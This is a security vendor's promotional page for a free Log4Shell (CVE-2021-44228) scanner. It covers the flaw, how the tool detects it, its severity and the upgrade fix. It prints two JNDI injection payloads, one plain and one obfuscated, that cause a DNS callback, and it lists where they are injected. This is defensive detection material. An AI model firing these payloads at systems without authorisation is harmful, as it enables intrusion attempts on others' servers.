Log4j Scanner (CVE-2021-44228 - Log4Shell vulnerability)
This free Log4j vulnerability scanner checks if CVE-2021-44228 - aka the Log4Shell vulnerability - affects your target.
Unauthenticated attackers can exploit this high-risk security issue to gain Remote Code Execution and fully compromise the server to steal confidential information, install ransomware, or pivot to the internal network.
If you’d like to detect other vulnerabilities, this free tool is part of the premium version of our Network Vulnerability Scanner, whose Deep Scan option identifies over 11.000 CVEs. For full access to it and other 20+ tools, check out our pricing plans.
Network Vulnerability ScannerThis free Log4j vulnerability scanner checks if CVE-2021-44228 - aka the Log4Shell vulnerability - affects your target.
Unauthenticated attackers can exploit this high-risk security issue to gain Remote Code Execution and fully compromise the server to steal confidential information, install ransomware, or pivot to the internal network.
What is the Log4j vulnerability (CVE-2021-44228)
The Log4j vulnerability stems from improper input validation in the JNDI functionality of Apache Log4j versions 2.14.1 and earlier. The "message lookup substitution" feature, enabled by default in these versions, allows attackers to load and execute arbitrary Java code from a remote LDAP server.
What makes this an even bigger problem for security teams is that JNDI lookups support multiple protocols, including LDAP, LDAPS, DNS, and RMI.
Therefore, if an attacker can control the log messages and inject arbitrary code via input parameters or HTTP headers, they can create a malicious Java class on a server they control.
The vulnerable server would then use the lookup method to execute this malicious Java class from the LDAP/LDAPS/DNS/RMI server.
How we detect the Log4j vulnerability (CVE-2021-44228)
This Log4j vulnerability scanner uses a payload like: ${jndi:dns://${hostName}.private-dns-server}
or ${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://{hostName}.private-dns-server}
and injects it into the URL or custom headers.
To scan for Log4j, this tool uses some of the detection capabilities from our Network Vulnerability Scanner, but the paid version of our Website Vulnerability Scanner can also find the Log4j vulnerability.
The Website Scanner inserts the payload in various locations within the target application, including the Base URL, HTTP headers (over 50 headers), and all input fields in HTML forms (e.g., username, search, etc.), which it discovers by crawling the app. If the application is vulnerable, the Log4j checker mechanism will trigger a DNS request to one of the private DNS servers hosted in our cloud environment.
If you’re interested in even more details around this, we explained how to check for the Log4j vulnerability in a dedicated article.
Log4j vulnerability (CVE-2021-44228) severity
Even though it’s been a few years since CVE-2021-44228 emerged in December 2021, many security and IT folks are still looking for quick ways to scan for the Log4j vulnerability. That’s because this security issue has a high severity CVSSv3 score of 10 and it is included in the Known Exploited Vulnerabilities database from the Cybersecurity and Infrastructure Security Agency (CISA).
How to fix the Log4j vulnerability - CVE-2021-44228 mitigation
We recommend updating the Log4j library to at least version 2.17.1.
This version not only fixes the vulnerability but also addresses additional security issues found after the initial patch. The initial fix was incomplete in certain non-default configurations which is why CVE-2021-45046 appeared.
If you’ve already applied the initial fix and are unsure if the subsequent Log4j RCE (CVE-2021-45046) persists in your systems, you can use the Deep scan option of our Network Vulnerability Scanner (paid) to run another test and confirm - or disprove - it.
Log4j detection references
Log4Shell scanner report
Now that you’ve found how to scan for the Log4j vulnerability quickly and at zero cost, maybe you’re curious what you’ll get after the scan finishes.
Here’s a sample report from our free Log4j vulnerability scanner, which you can export as PDF. This is the kind of proof and remediation advice you’ll get if our Log4j vulnerability scanner finds any vulnerable systems in your infrastructure:
About our Network Vulnerability Scanner
Our Network Vulnerability Scanner is a well-rounded tool for all your network security assessments.
It combines multiple engines and fine-tuned (customizable) scan settings which surface over 20.000 critical vulnerabilities, misconfigurations, and outdated services.
Each scan automatically updates your attack surface and provides an up-to-date map for planning targeted attacks or strategic lateral movements.
In a transparent benchmark, our tool outperformed the 6 most popular network scanners on the market, both open-source and commercial.
Explore a sample report which includes a vulnerability summary, automatically confirmed findings, evidence, and more.
FAQ
What is Log4j?
Log4j is a popular logging library used by many applications and services. It's one of several Java logging frameworks and is part of the Apache Logging Services, a project under the Apache Software Foundation.
What is the Log4shell attack surface?
According to this repository, the following organizations have been confirmed to have systems vulnerable to CVE-2021-44228, the notorious Log4j vulnerability: Apple, Google, Linkedin, Webex, Tencent, Steam, Twitter, Baidu, DIDI, JD, NetEase, Cloudflare, Amazon, Tesla, Apache Solr, Apache Druid, Apache Struts2, IBM Qradar SIEM, PaloAlto Panorama, ElasticSearch, Ghidra, Minecraft, PulseSecure, UniFi, VMWare, Blender.
Which are the vulnerable Log4j versions?
All Log4j versions before 2.17.1 are vulnerable.
This means that a remote attacker, without needing any authentication, can completely take over the server.
Why are you offering a free Log4j vulnerability scanner?
Every day, we develop tools, detections, and exploits to help ethical hackers enhance organizational defenses.
We know the fight is unfair and rigged; security people follow strict rules, while threat actors do anything they want.
That's why our team dissects vulnerabilities and creates tools (sometimes free ones), so cybersecurity specialists can do good and counteract the damage criminals cause with their own methods.
Read more in our vulnerability research manifesto.